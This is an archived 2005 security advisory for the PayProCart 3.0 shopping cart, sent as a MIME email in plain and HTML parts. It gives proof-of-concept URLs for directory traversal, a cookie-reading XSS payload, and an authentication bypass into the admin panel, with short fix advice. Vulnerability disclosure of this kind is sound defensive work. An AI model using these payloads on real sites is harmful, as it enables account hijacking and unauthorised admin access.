PayProCart30.txt

2005-04-17T00:00:00
ID PACKETSTORM:36998
Type packetstorm
Reporter Diabolic Crab
Modified 2005-04-17T00:00:00

Description

                                        
                                            `This is a multi-part message in MIME format.  
  
------=_NextPart_000_0006_01C5395C.BF487B20  
Content-Type: text/plain;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
  
-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Dcrab 's Security Advisory  
[Hsc Security Group] http://www.hackerscenter.com/  
[dP Security] http://digitalparadox.org/  
  
Get Dcrab's Services to audit your Web servers, scripts, networks, etc. =  
Learn more at http://www.digitalparadox.org/services.ah  
  
Severity: High  
Title: Authenticaion bypass, Directory transversal and XSS =  
vulnerabilities in PayProCart 3.0 - Profitcode Software  
Date: 05/04/2005  
  
Vendor: ProftCode Softwares  
Vendor Website: http://www.profitcode.net  
Summary: There are, authenticaion bypass, directory transversal and xss =  
vulnerabilities in payprocart 3.0 - profitcode software.  
  
Proof of Concept Exploits:=20  
  
http://localhost/index.php?modID=3D../EVIL_VALUE  
Directory Transversal  
Warning: main(tplates/../EVIL_VALUE.php) [function.main]: failed to open =  
stream: No such file or directory in /home/*******/web/*******/index.php =  
on line 159  
  
  
Warning: main() [function.include]: Failed opening =  
'tplates/../EVIL_VALUE.php' for inclusion =  
(include_path=3D'.:/usr/local/lib/php') in =  
/home/*******/web/*******/index.php on line 159  
  
http://localhost/usrdetails.php?sgnuptype=3D%22%3E%3Cscript%3Ealert(docum=  
ent.cookie)%3C/script%3E  
Pops Cookie  
  
  
http://localhost/adminshop/index.php?proMod=3Dindex&amp%3bftoedit=3D..%2f=  
shopincs%2fmaintopENG  
Authentication Bypass, Gives access to Admin control panel  
After a couple seconds press stop and done, look done at the last =  
screen, thats the administration panel, you now have admin access to the =  
shopping cart.  
  
  
Possible Fixes: The usage of htmlspeacialchars(), mysql_escape_string(), =  
mysql_real_escape_string() and other functions for input validation =  
before passing user input to the mysql database, or before echoing data =  
on the screen, would solve these problems.  
  
Keep your self updated, Rss feed at: http://digitalparadox.org/rss.ah  
  
Author:=20  
These vulnerabilties have been found and released by Diabolic Crab, =  
Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel free to =  
  
contact me regarding these vulnerabilities. You can find me at, =  
http://www.hackerscenter.com or http://digitalparadox.org/. Lookout for =  
my soon to come out book on Secure coding with php.=20  
-----BEGIN PGP SIGNATURE-----  
Version: PGP 8.1 - not licensed for commercial use: www.pgp.com  
  
iQA/AwUBQlFhqSZV5e8av/DUEQIgwACgxNEQ+C4Sy3x6of/R5CF+klPpNEEAoJi3  
UzBEsLKM5uDraMzb/rNUUrRU  
=3DzUyN  
-----END PGP SIGNATURE-----  
  
  
------=_NextPart_000_0006_01C5395C.BF487B20  
Content-Type: text/html;  
charset="iso-8859-1"  
Content-Transfer-Encoding: quoted-printable  
  
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">  
<HTML><HEAD>  
<META http-equiv=3DContent-Type content=3D"text/html; =  
charset=3Diso-8859-1">  
<META content=3D"MSHTML 6.00.2900.2604" name=3DGENERATOR>  
<STYLE></STYLE>  
</HEAD>  
<BODY bgColor=3D#ffffff><FONT face=3DArial size=3D2>  
<DIV><BR>-----BEGIN PGP SIGNED MESSAGE-----<BR>Hash: SHA1</DIV>  
<DIV> </DIV>  
<DIV>Dcrab 's Security Advisory<BR>[Hsc Security Group] <A=20  
href=3D"http://www.hackerscenter.com/">http://www.hackerscenter.com/</A><=  
BR>[dP=20  
Security] <A=20  
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A></DIV>  
<DIV> </DIV>  
<DIV>Get Dcrab's Services to audit your Web servers, scripts, networks, =  
etc.=20  
Learn more at <A=20  
href=3D"http://www.digitalparadox.org/services.ah">http://www.digitalpara=  
dox.org/services.ah</A></DIV>  
<DIV> </DIV>  
<DIV>Severity: High<BR>Title: Authenticaion bypass, Directory =  
transversal and=20  
XSS vulnerabilities in PayProCart 3.0 - Profitcode Software<BR>Date:=20  
05/04/2005</DIV>  
<DIV> </DIV>  
<DIV>Vendor: ProftCode Softwares<BR>Vendor Website: <A=20  
href=3D"http://www.profitcode.net">http://www.profitcode.net</A><BR>Summa=  
ry: There=20  
are, authenticaion bypass, directory transversal and xss vulnerabilities =  
in=20  
payprocart 3.0 - profitcode software.</DIV>  
<DIV> </DIV>  
<DIV>Proof of Concept Exploits: </DIV>  
<DIV> </DIV>  
<DIV><A=20  
href=3D"http://localhost/index.php?modID=3D../EVIL_VALUE">http://localhos=  
t/index.php?modID=3D../EVIL_VALUE</A><BR>Directory=20  
Transversal<BR>Warning: main(tplates/../EVIL_VALUE.php) [function.main]: =  
failed=20  
to open stream: No such file or directory in =  
/home/*******/web/*******/index.php=20  
on line 159</DIV>  
<DIV> </DIV>  
<DIV><BR>Warning: main() [function.include]: Failed opening=20  
'tplates/../EVIL_VALUE.php' for inclusion =  
(include_path=3D'.:/usr/local/lib/php')=20  
in /home/*******/web/*******/index.php on line 159</DIV>  
<DIV> </DIV>  
<DIV><A=20  
href=3D"http://localhost/usrdetails.php?sgnuptype=3D%22%3E%3Cscript%3Eale=  
rt(document.cookie)%3C/script%3E">http://localhost/usrdetails.php?sgnupty=  
pe=3D%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E</A><BR>Pops=20  
Cookie</DIV>  
<DIV> </DIV>  
<DIV><BR><A=20  
href=3D"http://localhost/adminshop/index.php?proMod=3Dindex&amp%3bfto=  
edit=3D..%2fshopincs%2fmaintopENG">http://localhost/adminshop/index.php?p=  
roMod=3Dindex&amp%3bftoedit=3D..%2fshopincs%2fmaintopENG</A><BR>Authe=  
ntication=20  
Bypass, Gives access to Admin control panel<BR>After a couple seconds =  
press stop=20  
and done, look done at the last screen, thats the administration panel, =  
you now=20  
have admin access to the shopping cart.</DIV>  
<DIV> </DIV>  
<DIV><BR>Possible Fixes: The usage of htmlspeacialchars(),=20  
mysql_escape_string(), mysql_real_escape_string() and other functions =  
for input=20  
validation before passing user input to the mysql database, or before =  
echoing=20  
data on the screen, would solve these problems.</DIV>  
<DIV> </DIV>  
<DIV>Keep your self updated, Rss feed at: <A=20  
href=3D"http://digitalparadox.org/rss.ah">http://digitalparadox.org/rss.a=  
h</A></DIV>  
<DIV> </DIV>  
<DIV>Author: <BR>These vulnerabilties have been found and released by =  
Diabolic=20  
Crab, Email: dcrab[AT|NOSPAM]hackerscenter[DOT|NOSPAM]com, please feel =  
free to=20  
<BR>contact me regarding these vulnerabilities. You can find me at, <A=20  
href=3D"http://www.hackerscenter.com">http://www.hackerscenter.com</A> =  
or <A=20  
href=3D"http://digitalparadox.org/">http://digitalparadox.org/</A>. =  
Lookout for my=20  
soon to come out book on Secure coding with php. <BR>-----BEGIN PGP=20  
SIGNATURE-----<BR>Version: PGP 8.1 - not licensed for commercial use: <A =  
  
href=3D"http://www.pgp.com">www.pgp.com</A></DIV>  
<DIV> </DIV>  
<DIV>iQA/AwUBQlFhqSZV5e8av/DUEQIgwACgxNEQ+C4Sy3x6of/R5CF+klPpNEEAoJi3<BR>=  
UzBEsLKM5uDraMzb/rNUUrRU<BR>=3DzUyN<BR>-----END=20  
PGP SIGNATURE-----<BR></FONT></DIV>  
<DIV><FONT face=3DArial size=3D2></FONT> </DIV></BODY></HTML>  
  
------=_NextPart_000_0006_01C5395C.BF487B20--  
`